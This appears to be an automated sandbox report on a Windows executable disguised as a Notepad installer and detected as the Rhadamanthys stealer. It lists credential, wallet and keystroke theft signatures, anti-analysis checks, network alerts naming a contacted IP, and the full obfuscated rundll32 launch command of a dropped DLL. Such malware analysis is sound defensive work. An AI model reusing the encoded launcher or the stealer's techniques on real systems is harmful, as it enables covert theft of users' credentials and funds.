Windows Analysis Report
Notteppad_SettupX32iX64.exe

Overview

General Information

Sample Name: Notteppad_SettupX32iX64.exe
Analysis ID: 783578
MD5: e7dfb892dbd65b0ed6fed69b20edf739
SHA1: 1cc4b53dcd7add65fe4b11531751b43f2d7e387d
SHA256: 2a4637eeb74d47ddbe7ff10f005806bce77ee877b9ae52f55bf6ae425cc3fcd5
Tags: exe, Rhadamanthys

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to detect virtual machines
Contains functionality to detect virtual machines (IN, VMware)
Searches for specific processes (likely to inject)
Found API chain indicative of debugger detection
Tries to harvest and steal Bitcoin Wallet information
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Queries device information via Setup API
Contains functionality to detect virtual machines (STR)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to detect virtual machines (SIDT)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Contains functionality to read device registry values (via SetupAPI)
PE file contains more sections than normal
Yara detected Keylogger Generic
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)

Classification

  • System is w10x64
  • Notteppad_SettupX32iX64.exe (PID: 5280 cmdline: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe MD5: E7DFB892DBD65B0ED6FED69B20EDF739)
    • rundll32.exe (PID: 5152 cmdline: "C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DWvAEoAUB8AbyMAZv8AcQBtAHUAQc8ATABOJwAtAVlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKTz8P9Ni8RBixBFM||SSAPTigKEwP90HUHByg0Pvr3A+gABRAPQvxF1|+xBgfqq|A18|3QOg8EBSYPA|wRBO8lzaevG|4vBD7cMTkWL|yyLTAPrdFgzfe2qEHRRQYsUwQD|0zPJigJMi8Jv6w|BycgRA8jlEO8BQYoA1RDtM8A|M|ZBOwy24BCmAP+DxgGD+Ahy7v|rCkiLy0H|1b9JiQT3g8XkEMS|BDtvGHKvZgFB|19BXkFdQVxf915dWzMXSIHsYP0BZACL6ehm|v9||0iFwA+EmHUg60yNrwGLKxDIM||76Jt9II1fBEyN|0VGM9KLy|9U+yRogCBMi+APhPVrdSBFqBAzwIvTvpEgSIl8JCCmIHB+gCBIi|APhEt1IP6mIFBIjVYIRI2|R0BIjYwkhRFI34vY6Hz9fiCNVtVI3iAQ4iHM8|DoZ37vIESLBo1XCEEgeqYgWMohiYQkgIcS7d7z8IsO2iBYiYyxJHERBzCRIOgx7yCL|ZwtMkyLXTpIg|f7bEiKIDBMiWTfJDhMi6QaMkyJ3VyEAYQk3IcRhpJ2jRGNR0swjCTw8|C|SYvU6On8BTCK3Zx4MkiNhHgyQYD|8yGNT2xEMBj+pAKD6QF184G8|ngyIVJleHVNi3eEJPQiMZQk+DUB|8JIO9hyOIP6f2x2M0SNSUD6AE+UQbgAmACmIEDKIs|4dBlEtjDAMUmN91QkbJEgSYPobLvoa4IwSIvOpiB4|0iF|3QSi1VC+UyOMBsxSI1MJEAf|9dIgcR0IWEkLQgALQE= MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 3560 cmdline: C:\Windows\system32\WerFault.exe -u -p 5152 -s 272 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000000.00000003.243662510.00000000007F6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
(4 further entries not shown)

Source | Rule | Description | Author | Strings
0.3.Notteppad_SettupX32iX64.exe.2a20000.2.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

No Sigma rule has matched
Timestamp: 01/13/23-05:12:09.288311
Source IP: 192.168.2.3
Destination IP: 164.90.172.224
Source Port: 49698
Destination Port: 80
SID: 2043202
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/13/23-05:12:09.323085
Source IP: 164.90.172.224
Destination IP: 192.168.2.3
Source Port: 80
Destination Port: 49698
SID: 2853001
Protocol: TCP
Classtype: A Network Trojan was detected


              AV Detection

Source: Notteppad_SettupX32iX64.exe; ReversingLabs: Detection: 19%
Source: Notteppad_SettupX32iX64.exe; Virustotal: Detection: 21%
Source: C:\Windows\System32\rundll32.exe; Code function: 1_2_00007DF4B3C1C06C CryptUnprotectData, 1_2_00007DF4B3C1C06C
Source: Notteppad_SettupX32iX64.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: Binary string: wkernel32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245563996.00000000025D0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245469036.000000000250D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.0000000002507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000002C80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.289392390.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shell32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.284854081.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000002C80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdb source: rundll32.exe, 00000001.00000003.280972629.0000025AA3B65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.282135570.0000025AA3CFD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: win32u.pdb source: rundll32.exe, 00000001.00000003.280859396.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shell32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: imm32.pdb source: rundll32.exe, 00000001.00000003.283179571.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdbUGP source: rundll32.exe, 00000001.00000003.280972629.0000025AA3B65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.282135570.0000025AA3CFD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.00000000028AC000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: profapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293014153.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msctf.pdbUGP source: rundll32.exe, 00000001.00000003.283688801.0000025AA3B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.00000000028AC000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.0000000002507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.269181411.0000025AA3900000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ole32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002830000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293112471.0000025AA3A1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdbUGP source: rundll32.exe, 00000001.00000003.293051816.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdb source: rundll32.exe, 00000001.00000003.293051816.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msctf.pdb source: rundll32.exe, 00000001.00000003.283688801.0000025AA3B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ole32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002830000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293112471.0000025AA3A1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: win32u.pdbGCTL source: rundll32.exe, 00000001.00000003.280859396.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.292944490.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imm32.pdbUGP source: rundll32.exe, 00000001.00000003.283179571.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.292944490.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.284854081.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.289392390.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.269181411.0000025AA3900000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQuer
yWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
              Source: Binary string: profapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293014153.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
